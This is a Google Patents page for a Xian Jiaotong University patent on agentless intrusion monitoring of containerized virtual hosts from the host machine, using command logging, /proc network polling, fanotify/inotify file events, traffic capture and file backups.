CN114978963B - Network system monitoring analysis method and device, electronic equipment and storage medium - Google Patents

Network system monitoring analysis method and device, electronic equipment and storage medium Download PDF

Info

Publication number
CN114978963B
CN114978963B CN202210445794.7A CN202210445794A CN114978963B CN 114978963 B CN114978963 B CN 114978963B CN 202210445794 A CN202210445794 A CN 202210445794A CN 114978963 B CN114978963 B CN 114978963B
Authority
CN
China
Prior art keywords
file
host
event
virtual
network connection
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Active
Application number
CN202210445794.7A
Other languages
Chinese (zh)
Other versions
CN114978963A (en
Inventor
陶敬
付鹏
韩婷
李峰远
陈凯梁
阿晨
曹垦
熊宇恒
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Xian Jiaotong University
Original Assignee
Xian Jiaotong University
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Xian Jiaotong University filed Critical Xian Jiaotong University
Priority to CN202210445794.7A priority Critical patent/CN114978963B/en
Publication of CN114978963A publication Critical patent/CN114978963A/en
Application granted granted Critical
Publication of CN114978963B publication Critical patent/CN114978963B/en
Active legal-status Critical Current
Anticipated expiration legal-status Critical

Links

Classifications

    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L43/00Arrangements for monitoring or testing data switching networks
    • H04L43/10Active monitoring, e.g. heartbeat, ping or trace-route
    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F9/00Arrangements for program control, e.g. control units
    • G06F9/06Arrangements for program control, e.g. control units using stored programs, i.e. using an internal store of processing equipment to receive or retain programs
    • G06F9/44Arrangements for executing specific programs
    • G06F9/455Emulation; Interpretation; Software simulation, e.g. virtualisation or emulation of application or operating system execution engines
    • G06F9/45533Hypervisors; Virtual machine monitors
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L41/00Arrangements for maintenance, administration or management of data switching networks, e.g. of packet switching networks
    • H04L41/14Network analysis or design
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L43/00Arrangements for monitoring or testing data switching networks
    • H04L43/50Testing arrangements
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L49/00Packet switching elements
    • H04L49/70Virtual switches
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L67/00Network arrangements or protocols for supporting network services or applications
    • H04L67/01Protocols
    • H04L67/10Protocols in which an application is distributed across nodes in the network
    • H04L67/1095Replication or mirroring of data, e.g. scheduling or transport for data synchronisation between network nodes
    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F9/00Arrangements for program control, e.g. control units
    • G06F9/06Arrangements for program control, e.g. control units using stored programs, i.e. using an internal store of processing equipment to receive or retain programs
    • G06F9/44Arrangements for executing specific programs
    • G06F9/455Emulation; Interpretation; Software simulation, e.g. virtualisation or emulation of application or operating system execution engines
    • G06F9/45533Hypervisors; Virtual machine monitors
    • G06F9/45558Hypervisor-specific management and integration aspects
    • G06F2009/45587Isolation or security of virtual machine instances
    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F9/00Arrangements for program control, e.g. control units
    • G06F9/06Arrangements for program control, e.g. control units using stored programs, i.e. using an internal store of processing equipment to receive or retain programs
    • G06F9/44Arrangements for executing specific programs
    • G06F9/455Emulation; Interpretation; Software simulation, e.g. virtualisation or emulation of application or operating system execution engines
    • G06F9/45533Hypervisors; Virtual machine monitors
    • G06F9/45558Hypervisor-specific management and integration aspects
    • G06F2009/45591Monitoring or debugging support

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Software Systems (AREA)
  • Theoretical Computer Science (AREA)
  • Physics & Mathematics (AREA)
  • General Engineering & Computer Science (AREA)
  • General Physics & Mathematics (AREA)
  • Health & Medical Sciences (AREA)
  • Cardiology (AREA)
  • General Health & Medical Sciences (AREA)
  • Data Exchanges In Wide-Area Networks (AREA)

Abstract

The embodiment of the application provides a network system monitoring and analyzing method, a device, electronic equipment and a storage medium, and belongs to the technical field of computers. The method is applied to a plurality of containerized virtual hosts, the plurality of virtual hosts being installed on a host machine, the method comprising: acquiring related information of the multiple virtual hosts from outside the multiple virtual hosts on the host, wherein the related information comprises network connection information, file events, user behaviors, flow and backup files; and monitoring the plurality of virtual hosts based on the related information, and analyzing events occurring in the plurality of virtual hosts. The application aims at monitoring and analyzing the virtual host outside the virtual host.

Description

Network system monitoring analysis method and device, electronic equipment and storage medium
Technical Field
The embodiment of the application relates to the field of computer technology, in particular to a network system monitoring and analyzing method, a device, electronic equipment and a storage medium.
Background
The virtual hosts are a plurality of independent hosts running on the same hardware and the same operating system, and each virtual host has a part of own system resources (IP addresses, document storage space, memory, CPU and the like); the virtual hosts are completely independent, and the appearance of each virtual host and an independent host is completely the same in external view; such virtualized logical hosts are visually referred to as "virtual hosts"; there are hosts, which are physical hosts that provide support for a virtual host, such as a running environment.
A lightweight virtual host represented by a container is also now presented; different from the virtual machine, the container shares a host machine kernel; the container is based on technical manufacturing constraints of namespaces, cgroup and the like, and the process view is modified so that the container is an independent environment from the inside; the resources such as files, user behaviors, network connection and the like in the container are mapped correspondingly on the host machine, and can be directly captured from the host machine.
When a virtual host of the container is operated, monitoring analysis is required to be carried out on the virtual host so as to prevent external invasion; the traditional virtual host monitoring and analyzing technology is generally realized by installing probes or agents in the virtual hosts, and the mode needs to be installed in each virtual host, so that deployment is troublesome; second, the method has security risk, and the probe or agent related process or file may be discovered and deleted by hackers, thereby affecting the monitoring analysis of the virtual host.
Disclosure of Invention
The embodiment of the application provides a network system monitoring and analyzing method, a device, electronic equipment and a storage medium, which aim at monitoring and analyzing a virtual host outside the virtual host.
In a first aspect, an embodiment of the present application provides a network system monitoring and analyzing method, where the method is applied to a plurality of containerized virtual hosts, where the plurality of virtual hosts are installed on a host, and the method includes:
Acquiring related information of the multiple virtual hosts from outside the multiple virtual hosts on the host, wherein the related information comprises network connection information, file events, user behaviors, flow and backup files;
and monitoring the plurality of virtual hosts based on the related information, and analyzing events occurring in the plurality of virtual hosts.
Optionally, the monitoring the relevant information of the plurality of virtual hosts from outside the plurality of virtual hosts on the host includes:
Capturing all user behaviors on the host machine which are related to the plurality of virtual machines;
polling the host for network connection information associated with the plurality of virtual hosts;
And capturing file events which occur under the mirror image read-write layer file directory on the host machine and related to the plurality of virtual machines.
Optionally, the capturing all user behaviors related to the plurality of virtual hosts on the host includes:
Starting a user behavior monitoring program to monitor all user operations on the host;
acquiring output information of the user behavior monitoring program, analyzing the output information of the user behavior monitoring program, and acquiring an operation command record;
Acquiring a parent process number in the operation command record, and acquiring control group information of all operation command record associated processes in the host based on the parent process number;
and based on the control group information, the operation command records are in one-to-one correspondence with a plurality of virtual hosts and recorded.
Optionally, the polling the host for network connection information related to the plurality of virtual hosts includes:
creating a network connection record table, wherein the network connection record table is used for recording network connection information related to the plurality of virtual hosts in the host;
acquiring process numbers of processes related to the multiple virtual hosts in the host;
periodically acquiring network connection information related to the process number of the process based on the process number of the process;
determining whether the network connection information exists in the network connection record table,
If yes, updating the starting time and the ending time of the network connection information in the network connection record table;
if not, adding the network connection information into the network connection record table;
Analyzing each network connection information in the network connection record table, and obtaining virtual host connection information corresponding to each network connection information, wherein the virtual host connection information comprises a virtual host IP, a starting time, an ending time, a local IP address, a local port, an external IP, an external port, a user name, a process executable file name and a process number of a process;
and expanding the network connection information of a plurality of virtual hosts in the network connection record table based on the virtual host connection information.
Optionally, the capturing the file event occurring under the mirror image readable and writable layer file directory on the host machine related to the multiple virtual machines includes:
creating a file event monitoring directory, traversing a mirror layer directory on the host machine, and adding the mirror layer directory into the file event monitoring directory;
Starting a file monitoring program to monitor file events generated by all files in the file event monitoring catalog, wherein the types of the file events comprise access events, opening events, closing events, attribute modification events, creation events, deletion events and movement events;
analyzing the acquired file event to acquire a file path of a file in the file event;
judging the type of the file event;
If the type of the file event is an access event, an opening event, a closing event or an attribute modification event, storing the file event and a file path;
if the type of the file event is a creation event, a deletion event or a movement event, updating the file event monitoring directory based on the file event, and storing the file event and the file path;
And according to the mirror image layer directory names in the file path, the mirror image layer directory names are in one-to-one correspondence with the plurality of virtual hosts.
Optionally, the obtaining the backup files of the plurality of virtual hosts includes:
Copying files of the plurality of virtual hosts from the mirror image readable and writable layer file catalogs on the host machine and related to the plurality of virtual hosts to obtain backup files.
Optionally, the analyzing, based on the backup file, an event occurring in the virtual host includes:
Acquiring operation commands of the plurality of virtual hosts;
detecting a file downloading event and a file modifying event in the host system based on the operation command;
When the file downloading event occurs, acquiring and storing a downloading link in the file downloading event;
when the file modification event occurs, backing up the modified file in the file modification event, and acquiring file path information of the modified file in the file modification event;
And analyzing the event occurring in the virtual host based on the download link and the file path information.
In a second aspect, an embodiment of the present application provides a network system monitoring and analyzing device, where the monitoring and analyzing device includes an information acquisition module and an analysis module;
The information acquisition module is used for acquiring related information of the plurality of virtual hosts from outside the plurality of virtual hosts on the host, wherein the related information comprises network connection information, file events, user behaviors, flow and backup files;
and the analysis module is used for monitoring the plurality of virtual hosts based on the related information and analyzing events occurring in the plurality of virtual hosts.
In a third aspect, an embodiment of the present application provides an electronic device, including a memory, a processor, and a computer program stored on the memory and executable on the processor, where the processor implements a network system monitoring and analyzing method according to any one of the first aspects when the processor executes the computer program.
In a fourth aspect, the computer readable storage medium stores a computer program, which when executed by a processor implements a network system monitoring and analysis method according to any of the first aspects.
The beneficial effects are that: a plurality of virtual hosts are installed on a host machine, relevant information of each virtual host machine is positioned from the host machine, and monitoring analysis is carried out from the outside of the virtual host machine. Specifically, network connection information, file events, user behaviors, traffic and backup files related to a plurality of virtual hosts are acquired from outside the plurality of virtual hosts on a host machine; monitoring analysis can be carried out on a plurality of virtual hosts on a host machine through network connection information, file events, user behaviors, flow and backup files, and the monitoring analysis is carried out on the host machine in the monitoring and analysis process without intervention into the virtual host machine for operation; the effect of continuously monitoring the virtual host outside the virtual host and analyzing various events occurring in the virtual host is achieved.
Drawings
In order to more clearly illustrate the technical solutions of the embodiments of the present application, the drawings that are needed in the description of the embodiments of the present application will be briefly described below, it being obvious that the drawings in the following description are only some embodiments of the present application, and that other drawings may be obtained according to these drawings without inventive effort for a person skilled in the art.
FIG. 1 is a flow chart of the steps of a method according to an embodiment of the present application;
FIG. 2 is a block diagram illustrating steps for file backup and analysis according to an embodiment of the present application;
Fig. 3 is a functional block diagram of a monitoring and analyzing apparatus according to another embodiment of the present application.
Detailed Description
The following description of the embodiments of the present application will be made clearly and fully with reference to the accompanying drawings, in which it is evident that the embodiments described are some, but not all embodiments of the application. All other embodiments, which can be made by those skilled in the art based on the embodiments of the application without making any inventive effort, are intended to be within the scope of the application.
Example 1
Referring to fig. 1, a flowchart illustrating steps of a network system monitoring and analyzing method in an embodiment of the present invention is shown, where the method is applied to a plurality of containerized virtual hosts, and the plurality of virtual hosts are installed on a host, and as shown in fig. 1, the method specifically may include the following steps:
S101, acquiring related information of a plurality of virtual hosts from outside the plurality of virtual hosts on the host, wherein the related information comprises network connection information, file events, user behaviors, flow and backup files;
The user behavior is mainly obtained for monitoring whether a hacker invades the virtual host from the outside of the virtual host; the user behavior mainly refers to an operation command on a host machine, and if an abnormal operation command is found in the captured user behavior, whether hacking occurs can be judged.
When an abnormal intrusion condition occurs in the virtual host, the intrusion condition can be specifically analyzed through the network connection information, and the specific process with the intrusion condition and the intruded virtual host can be positioned by judging which piece of network connection information has a problem.
When an intrusion event occurs, a hacker is most often involved in modifying, creating and deleting files, and by monitoring a readable and writable layer file directory on a host, file modification, creation and deletion occurring in a virtual host can be monitored to prevent corruption on a file level.
The number of accessed times, access time and access process of the virtual host can be counted through the captured flow, and if abnormal access conditions occur, analysis and analysis can be carried out through the captured flow.
S102, monitoring the plurality of virtual hosts based on the related information, and analyzing events occurring in the plurality of virtual hosts;
The virtual host installed on the host can be monitored in all aspects through user behaviors, network connection information, file events and flow, the virtual host is acquired through the host, an Agent or a probe is not required to be deployed in the virtual host during monitoring, all monitoring analysis processes are performed outside the virtual host, and the virtual host can be monitored in all aspects under the condition that a hacker does not feel.
After a malicious intrusion event occurs, maintenance staff of the virtual host can analyze the malicious intrusion event occurring in the virtual host through the backup file; if the files in the virtual host are maliciously deleted or maliciously changed, the files which are changed can be found by comparing the backup files with the files which are deleted and modified because the backup files exist, so that the events which occur in the virtual host can be analyzed.
In this embodiment, a plurality of virtual hosts are installed on a host, and the method locates information about each virtual host from the host, externally from the virtual host, and performs monitoring analysis. Specifically, network connection information, file events, user behaviors, traffic and backup files related to a plurality of virtual hosts are acquired from outside the plurality of virtual hosts on a host machine; monitoring analysis can be carried out on a plurality of virtual hosts on a host machine through network connection information, file events, user behaviors, flow and backup files, and the monitoring analysis is carried out on the host machine in the monitoring and analysis process without intervention into the virtual host machine for operation; the effect of continuously monitoring the virtual host outside the virtual host and analyzing various events occurring in the virtual host is achieved.
Example two
Referring to fig. 1, a flowchart illustrating steps of a network system monitoring and analyzing method according to an embodiment of the present application, as shown in fig. 1, the method is applied to a plurality of containerized virtual hosts, and the analyzing method specifically may include the following steps:
s101, acquiring related information of a plurality of virtual hosts from outside the plurality of virtual hosts on the host, wherein the related information comprises network connection information, file events, user behaviors, flow and backup files; comprising the following steps:
Capturing all user behaviors on the host machine which are related to the plurality of virtual machines;
polling the host for network connection information associated with the plurality of virtual hosts;
And capturing file events which occur under the mirror image read-write layer file directory on the host machine and related to the plurality of virtual machines.
Wherein capturing all user behavior on the host that is related to the plurality of virtual hosts comprises:
Starting a user behavior monitoring program to monitor all user operations on the host;
The user behavior monitoring program is a tool for system monitoring, analysis and obstacle removal, and registers a hook of system call in a driver module of a kernel, so that when the system call occurs and is completed, the user behavior monitoring program copies system call information to a specific buffer, and then a component of the user module processes (decompresses, analyzes, filters and the like) acquired data information, and finally interacts with a user through a command line of the user behavior monitoring program.
After the user behavior monitoring program is started, when a hacker invades the virtual host and executes the operation command, the user behavior monitoring program can capture and output the relevant operation command record of the user operation.
Acquiring output information of the user behavior monitoring program, analyzing the output information of the user behavior monitoring program, and acquiring an operation command record;
Acquiring a parent process number in the operation command record, and acquiring control group information of all operation command record associated processes in the host based on the parent process number;
Since the user behavior monitoring program monitors the host computer and does not contain information about the virtual host computer, the user behavior monitoring program cannot know in which virtual host computer the current operation command occurs, and therefore, the control group information of the relevant process is required to be obtained from the/proc/< ppid >/cgroup file of the parent process number according to the parent process number obtained by the user behavior monitoring program.
And based on the control group information, the operation command records are in one-to-one correspondence with a plurality of virtual hosts and recorded.
After the control group information of the relevant process of each operation command record is obtained through the/proc/< ppid >/cgroup file, the operation command record is associated with the corresponding virtual host according to the control group information, and the virtual host name and the operation command record are written into the database.
In this embodiment, the database is created for recording the monitoring information obtained by the method provided in this embodiment, and the database may be placed in a host machine or a cloud server, and all the monitoring information obtained by the method is recorded by the database, so that a worker can directly obtain all relevant monitoring information in the database when analysis is required in the later period.
Polling the host for network connection information associated with the plurality of virtual hosts, comprising:
creating a network connection record table, wherein the network connection record table is used for recording network connection information related to the plurality of virtual hosts in the host;
When monitoring and analyzing the network connection of the virtual host, the staff can obtain all needed information directly through the network connection record list.
Acquiring process numbers of processes related to the multiple virtual hosts in the host;
periodically acquiring network connection information related to the process number of the process based on the process number of the process;
when network connection information in a host is acquired, process numbers of all virtual host processes are firstly acquired, and a/proc/< pid >/net/tcp file corresponding to each process number is read from the host every second and is analyzed to acquire the network connection information of the current host.
Determining whether the network connection information exists in the network connection record table,
If yes, updating the starting time and the ending time of the network connection information in the network connection record table;
if not, adding the network connection information into the network connection record table;
Analyzing each network connection information in the network connection record table, and obtaining virtual host connection information corresponding to each network connection information, wherein the virtual host connection information comprises a virtual host IP, a starting time, an ending time, a local IP address, a local port, an external IP, an external port, a user name, a process executable file name and a process number of a process.
And expanding the network connection information of a plurality of virtual hosts in the network connection record table based on the virtual host connection information.
When the acquired network connection information is written into the network connection record table, if the network connection information is read in the/proc/< pid >/net/tcp file, the network connection information does not exist in the network connection record table. The network connection information is represented to be connected for the first time, the network connection information needs to be recorded in a network connection record table, the current time is taken as the connection starting time, and the current time is written into the network connection record table.
If the network connection information is not read in the/proc/< pid >/net/tcp file, the network connection information is contained in the network connection record table. It is necessary to record the network connection information in the database, representing that the connection corresponding to the network connection information has been disconnected. And taking the current time as the connection ending time, writing the current time and the information in the network connection record table into a database, and deleting the information in the network connection record table.
If the network connection information is read in the/proc/< pid >/net/tcp file, the network connection information is also contained in the network connection record table, which indicates that the network connection information is always present, and no operation is needed.
When the network connection information is recorded in the network connection record table, since the data collected in the/proc/< pid >/net/tcp file contains less information, the corresponding executable file, user and other information need to be obtained according to the information of inode, uid and the like in the/proc/< pid >/net/tcp file, the original network connection information is streamed, and written in the network connection record table.
The capturing the file event occurring under the mirror image readable and writable layer file directory on the host machine related to the plurality of virtual machines includes:
creating a file event monitoring directory, traversing a mirror layer directory on the host machine, and adding the mirror layer directory into the file event monitoring directory;
Starting a file monitoring program to monitor file events generated by all files in the file event monitoring catalog, wherein the types of the file events comprise access events, opening events, closing events, attribute modification events, creation events, deletion events and movement events;
In this embodiment, fanotify and inotify used by the file monitor are a file monitoring technology on the Linux platform, and through fanotify and inotify, file events occurring under the mirror layer directories related to the multiple virtual hosts on the host can be monitored.
After fanotify is started, all directories under the file event monitoring directory are traversed through a depth-first algorithm, a PATH array is created, and then the monitored file PATHs are stored in the PATH array. Initializing fanotify and inotify to obtain descriptors fa_fd and i_fd of the file event queue; by reading the descriptor, a file event is obtained. After traversing the PATH array, adding the file directory into the file event monitoring directory. And initializing poll, polling the event of fa_fd and command line input, and acquiring file event occurring on host.
Analyzing the obtained file event, and obtaining a file path of a file in the file event;
judging the type of the file event;
When judging, the method directly enters the fanotify event processing function, and directly outputs logs on access, opening, closing, attribute modification and running events of the files/catalogues. The method comprises the steps of creating, deleting and moving files/catalogues, firstly, reading i_fd to obtain specific names of the corresponding files/catalogues through an inotify processing function, storing the specific names into corresponding PATH arrays, then adding or deleting fanotify corresponding monitoring objects and inotify corresponding monitoring objects respectively, and finally returning to the fanotify processing function for log output.
If the type of the file event is an access event, an opening event, a closing event or an attribute modification event, storing the file event and a file path;
if the type of the file event is a creation event, a deletion event or a movement event, updating the file event monitoring directory based on the file event, and storing the file event and the file path;
And according to the mirror image layer directory names in the file path, the mirror image layer directory names are in one-to-one correspondence with the plurality of virtual hosts.
When the file event type is an access event, an opening event, a closing event or an attribute modification event, malicious invasion only browses files in the virtual host and does not modify the files in the virtual host, so that only a file path is needed to be saved, and the malicious file event in the virtual host can be judged through the file path. When the types of the file events are creation events, deletion events or movement events, the file in the virtual host is changed, and the file is possibly added or reduced, the file event monitoring directory needs to be updated, the added or reduced file is added into a monitoring target, the file events and the file paths are saved, and the occurred malicious file events can be traced through the file events and the file paths.
Further comprising capturing all traffic of the host:
acquiring the flow of the host;
the five-tuple information of the flow is obtained, wherein the five-tuple information comprises an IP address, a source port, a target address, a target port and a transport layer protocol;
Dividing the flow based on the IP address in the quintuple information, and storing the flow as a network packet capturing format file.
S102, monitoring the plurality of virtual hosts based on the related information, and analyzing events occurring in the plurality of virtual hosts;
Monitoring and analyzing the virtual host based on the user behavior, the network connection information, the file event and the flow;
Through user behavior, network connection information, file events and traffic, monitoring analysis of multiple angles can be performed on multiple virtual hosts on the host in real time.
Further included is analyzing events occurring in the virtual host based on the backup file, including:
Acquiring operation commands of the plurality of virtual hosts;
detecting a file downloading event and a file modifying event in the host system based on the operation command;
When the file downloading event occurs, acquiring and storing a downloading link in the file downloading event;
when the file modification event occurs, backing up the modified file in the file modification event, and acquiring file path information of the modified file in the file modification event;
And analyzing the event occurring in the virtual host based on the download link and the file path information.
Referring to FIG. 2, FIG. 2 illustrates the steps of file backup and analysis;
When the file is backed up and analyzed, the operation command is directly obtained from a plurality of virtual hosts on the host machine, and the file modification event and the file downloading event which occur in the plurality of virtual hosts are obtained according to the operation command.
Through the operation command, malicious invasion occurring in a plurality of virtual hosts can be obtained, when malicious file downloading links and file paths created or modified by hackers are found, the malicious file downloading links are stored in a database, and the malicious files and the files created or modified by the hackers are stored in a designated directory; by copying files of the plurality of virtual hosts in the mirror image readable and writable layer file catalogues related to the plurality of virtual hosts on the host machine for backup, important files can be ensured not to be deleted.
When the malicious file is detected to download the link in the monitoring process, the malicious file is directly stored in the download link, the malicious link is synchronized to the database, and meanwhile, the malicious file is downloaded to the appointed directory of the database, so that a hacker can be prevented from closing the download channel.
When the type of the detected file event is a creation event, a deletion event or a movement event, saving file path information into a database, and synchronizing files related to the file event into a designated directory in real time from a readable and writable layer of a container on a host machine so as to avoid deletion by a hacker; events occurring in multiple virtual hosts can be directly analyzed through the copied backup files and the saved download links.
In this embodiment, a plurality of virtual hosts are installed on a host, and the method locates information about each virtual host from the host, externally from the virtual host, and performs monitoring analysis. Specifically, network connection information, file events, user behaviors, traffic and backup files related to a plurality of virtual hosts are acquired from outside the plurality of virtual hosts on a host machine; monitoring analysis can be carried out on a plurality of virtual hosts on a host machine through network connection information, file events, user behaviors, flow and backup files, and the monitoring analysis is carried out on the host machine in the monitoring and analysis process without intervention into the virtual host machine for operation; the effect of continuously monitoring the virtual host outside the virtual host and analyzing various events occurring in the virtual host is achieved.
Example III
Based on the same inventive concept, fig. 3 is a schematic diagram of a network system monitoring and analyzing device, and referring to fig. 3, the monitoring and analyzing device may include: the information acquisition module and the analysis module;
The information acquisition module is used for acquiring related information of the plurality of virtual hosts from outside the plurality of virtual hosts on the host, wherein the related information comprises network connection information, file events, user behaviors, flow and backup files;
and the analysis module is used for monitoring the plurality of virtual hosts based on the related information and analyzing events occurring in the plurality of virtual hosts.
The information acquisition module comprises a user behavior monitoring unit, a network connection unit and a file time capturing unit;
The user behavior monitoring unit is used for capturing all user behaviors related to the plurality of virtual hosts on the host;
a network connection unit for polling the host for network connection information related to the plurality of virtual hosts;
and the file time capturing unit captures file events which occur under the mirror image readable and writable layer file directory related to the plurality of virtual hosts on the host machine.
For the device embodiments, since they are substantially similar to the method embodiments, the description is relatively simple, and reference is made to the description of the method embodiments for relevant points.
Example IV
Based on the same inventive concept, a fourth embodiment of the present application provides an electronic device, including: a memory, a processor, and a computer program stored on the memory and executable on the processor, the computer program implementing the steps of a network system monitoring and analysis method as in any one of the first and second embodiments when executed by the processor.
Example five
Based on the same inventive concept, a fifth embodiment of the present application provides a computer readable storage medium, on which a computer program is stored, which when executed by a processor, implements the steps of a network system monitoring and analyzing method according to any one of the first and second embodiments.
In this specification, each embodiment is described in a progressive manner, and each embodiment is mainly described by differences from other embodiments, and identical and similar parts between the embodiments are all enough to be referred to each other.
It will be apparent to those skilled in the art that embodiments of the present application may be provided as a method, apparatus, or computer program product. Accordingly, embodiments of the present application may take the form of an entirely hardware embodiment, an entirely software embodiment or an embodiment combining software and hardware aspects. Furthermore, embodiments of the application may take the form of a computer program product on one or more computer-usable storage media (including, but not limited to, disk storage, CD-ROM, optical storage, etc.) having computer-usable program code embodied therein.
Embodiments of the present application are described with reference to flowchart illustrations and/or block diagrams of methods, terminal devices (systems), and computer program products according to embodiments of the application. It will be understood that each flow and/or block of the flowchart illustrations and/or block diagrams, and combinations of flows and/or blocks in the flowchart illustrations and/or block diagrams, can be implemented by computer program instructions. These computer program instructions may be provided to a processor of a general purpose computer, special purpose computer, embedded processor, or other programmable data processing terminal device to produce a machine, such that the instructions, which execute via the processor of the computer or other programmable data processing terminal device, create means for implementing the functions specified in the flowchart flow or flows and/or block diagram block or blocks.
These computer program instructions may also be stored in a computer-readable memory that can direct a computer or other programmable data processing apparatus to function in a particular manner, such that the instructions stored in the computer-readable memory produce an article of manufacture including instruction means which implement the function specified in the flowchart flow or flows and/or block diagram block or blocks.
These computer program instructions may also be loaded onto a computer or other programmable data processing apparatus to cause a series of operational steps to be performed on the computer or other programmable apparatus to produce a computer implemented process such that the instructions which execute on the computer or other programmable apparatus provide steps for implementing the functions specified in the flowchart flow or flows and/or block diagram block or blocks.
While preferred embodiments of the present application have been described, additional variations and modifications in those embodiments may occur to those skilled in the art once they learn of the basic inventive concepts. It is therefore intended that the following claims be interpreted as including the preferred embodiment and all such alterations and modifications as fall within the scope of the embodiments of the application.
Finally, it is further noted that relational terms such as first and second, and the like are used solely to distinguish one entity or action from another entity or action without necessarily requiring or implying any actual such relationship or order between such entities or actions. Moreover, the terms "comprises," "comprising," or any other variation thereof, are intended to cover a non-exclusive inclusion, such that a process, method, article, or terminal that comprises a list of elements does not include only those elements but may include other elements not expressly listed or inherent to such process, method, article, or terminal. Without further limitation, an element defined by the phrase "comprising one … …" does not exclude the presence of other like elements in a process, method, article, or terminal device that comprises the element.
The principles and embodiments of the present application have been described herein with reference to specific examples, the description of which is intended only to assist in understanding the methods of the present application and the core ideas thereof; meanwhile, as those skilled in the art will have variations in the specific embodiments and application scope in accordance with the ideas of the present application, the present description should not be construed as limiting the present application in view of the above.

Claims (10)

1. The network system monitoring and analyzing method is characterized by being applied to a plurality of containerized virtual hosts, wherein the plurality of virtual hosts share a host computer kernel; the plurality of virtual hosts are installed on a host machine, the method comprising:
Acquiring related information of the multiple virtual hosts from outside the multiple virtual hosts on the host, wherein the related information comprises network connection information, file events, user behaviors, flow and backup files; the related information is provided with corresponding mapping outside the plurality of virtual hosts on the host machine;
and monitoring the plurality of virtual hosts based on the related information, and analyzing events occurring in the plurality of virtual hosts.
2. The network system monitoring and analyzing method according to claim 1, wherein the monitoring the information about the plurality of virtual hosts from outside the plurality of virtual hosts on the host machine comprises:
Capturing all user behaviors on the host machine which are related to the plurality of virtual machines;
polling the host for network connection information associated with the plurality of virtual hosts;
And capturing file events which occur under the mirror image read-write layer file directory on the host machine and related to the plurality of virtual machines.
3. The method of claim 2, wherein capturing all user behaviors on the host machine that are associated with the plurality of virtual machines comprises:
Starting a user behavior monitoring program to monitor all user operations on the host;
acquiring output information of the user behavior monitoring program, analyzing the output information of the user behavior monitoring program, and acquiring an operation command record;
Acquiring a parent process number in the operation command record, and acquiring control group information of all operation command record associated processes in the host based on the parent process number;
and based on the control group information, the operation command records are in one-to-one correspondence with a plurality of virtual hosts and recorded.
4. The method of claim 2, wherein the polling the host for network connection information associated with the plurality of virtual hosts comprises:
creating a network connection record table, wherein the network connection record table is used for recording network connection information related to the plurality of virtual hosts in the host;
acquiring process numbers of processes related to the multiple virtual hosts in the host;
periodically acquiring network connection information related to the process number of the process based on the process number of the process;
determining whether the network connection information exists in the network connection record table,
If yes, updating the starting time and the ending time of the network connection information in the network connection record table;
if not, adding the network connection information into the network connection record table;
Analyzing each network connection information in the network connection record table, and obtaining virtual host connection information corresponding to each network connection information, wherein the virtual host connection information comprises a virtual host IP, a starting time, an ending time, a local IP address, a local port, an external IP, an external port, a user name, a process executable file name and a process number of a process;
and expanding the network connection information of a plurality of virtual hosts in the network connection record table based on the virtual host connection information.
5. The method for monitoring and analyzing a network system according to claim 2, wherein capturing the file events occurring under the mirror image readable and writable layer file directory on the host machine related to the plurality of virtual machines comprises:
creating a file event monitoring directory, traversing a mirror layer directory on the host machine, and adding the mirror layer directory into the file event monitoring directory;
Starting a file monitoring program to monitor file events generated by all files in the file event monitoring catalog, wherein the types of the file events comprise access events, opening events, closing events, attribute modification events, creation events, deletion events and movement events;
analyzing the acquired file event to acquire a file path of a file in the file event;
judging the type of the file event;
If the type of the file event is an access event, an opening event, a closing event or an attribute modification event, storing the file event and a file path;
if the type of the file event is a creation event, a deletion event or a movement event, updating the file event monitoring directory based on the file event, and storing the file event and the file path;
And according to the mirror image layer directory names in the file path, the mirror image layer directory names are in one-to-one correspondence with the plurality of virtual hosts.
6. The method for monitoring and analyzing a network system according to claim 1, wherein the obtaining backup files of the plurality of virtual hosts includes:
Copying files of the plurality of virtual hosts from the mirror image readable and writable layer file catalogs on the host machine and related to the plurality of virtual hosts to obtain backup files.
7. The method of claim 2, wherein analyzing the event occurring in the virtual host based on the backup file comprises:
Acquiring operation commands of the plurality of virtual hosts;
detecting a file downloading event and a file modifying event in the host system based on the operation command;
When the file downloading event occurs, acquiring and storing a downloading link in the file downloading event;
when the file modification event occurs, backing up the modified file in the file modification event, and acquiring file path information of the modified file in the file modification event;
And analyzing the event occurring in the virtual host based on the download link and the file path information.
8. A network system monitoring and analyzing device, characterized in that the device is applied to a plurality of containerized virtual hosts, and the plurality of virtual hosts share a host computer kernel; the monitoring and analyzing device comprises an information acquisition module and an analyzing module;
the information acquisition module is used for acquiring related information of the plurality of virtual hosts from outside the plurality of virtual hosts on the host, wherein the related information comprises network connection information, file events, user behaviors, flow and backup files; the related information has corresponding mapping on the host;
and the analysis module is used for monitoring the plurality of virtual hosts based on the related information and analyzing events occurring in the plurality of virtual hosts.
